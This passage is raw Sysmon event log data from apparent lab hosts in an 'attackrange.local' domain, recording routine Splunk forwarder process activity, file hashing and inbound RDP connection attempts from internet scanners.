14:59:03.137{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:03.137{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:03.137{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:03.137{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC36-607E-640F-00000000BB01}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:03.137{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC36-607E-640F-00000000BB01}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:02.998{A7A01FEF-EC36-607E-640F-00000000BB01}6312C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000050728Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:03.893{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1004661F0291D97799B391124E8D5D8,SHA256=9CFDBDF59D3EEFCF4CA033E22AEB4840BC8B18B669A156B75558534C9F84AB9B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000050727Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:01.788{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-49467-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000081508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:03.847{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-58075-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000081507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:03.234{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com56772-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000081506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.294{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6087CC7E4E84156561275F6FDE1E409F,SHA256=DF133B7E38E1C67916C075705E82233FC1DEBEAE174DA09FEF554A4022E35EA5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.294{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC38-607E-650F-00000000BB01}4272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.294{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.294{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC38-607E-650F-00000000BB01}4272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.294{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC38-607E-650F-00000000BB01}4272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.154{A7A01FEF-EC38-607E-650F-00000000BB01}4272C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000081497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:04.153{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=060523706B872A0D533070F0AD761A8A,SHA256=28B6210B14D2A3C82BDC5ACFC3E47011B1B0B4F9FD8407FFC4F4A1E786E6992D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050730Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:04.940{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=061463B576613F73020B72AE3B8B1D09,SHA256=CDA4C142D6117AF266FF49369C13C23674D537885DE9B5A59A1E51E97BE9666D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000050729Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:59:04.440{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D9FD57653F63AA0DB0079D430378CA78,SHA256=F7FFA2A292F49162BC6663DA84FEA1DDFFCD47521A2159CF543FECDED7300368,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.653{A7A01FEF-B626-607E-0D00-00000000BB01}10084160C:\Windows\system32\svchost.exe{A7A01FEF-C0A6-607E-7605-00000000BB01}4400C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+b157|c:\windows\system32\rpcss.dll+7897|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.590{A7A01FEF-EC39-607E-660F-00000000BB01}51165064C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000081519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.450{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A34EE9E1B84AAE5458EA8C9345217E24,SHA256=02AFD8AD822408DB8BCA833F21381B2FD8D1F45A69DB2B444B3896D591AE446D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000081518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.434{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BD3C20F049CE890BCFE83100AE206C7,SHA256=D82CF83B6F86CEE28AC31BDD3E22359F388C94B1152FA9AC1669E6CC3FAA3283,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000081517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.434{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EC39-607E-660F-00000000BB01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.434{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.434{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.434{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.434{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000081512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.434{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EC39-607E-660F-00000000BB01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000081511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.434{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EC39-607E-660F-00000000BB01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000081510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:59:05.295{A7A01FEF-EC39-607E-660F-00000000BB01}5116C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 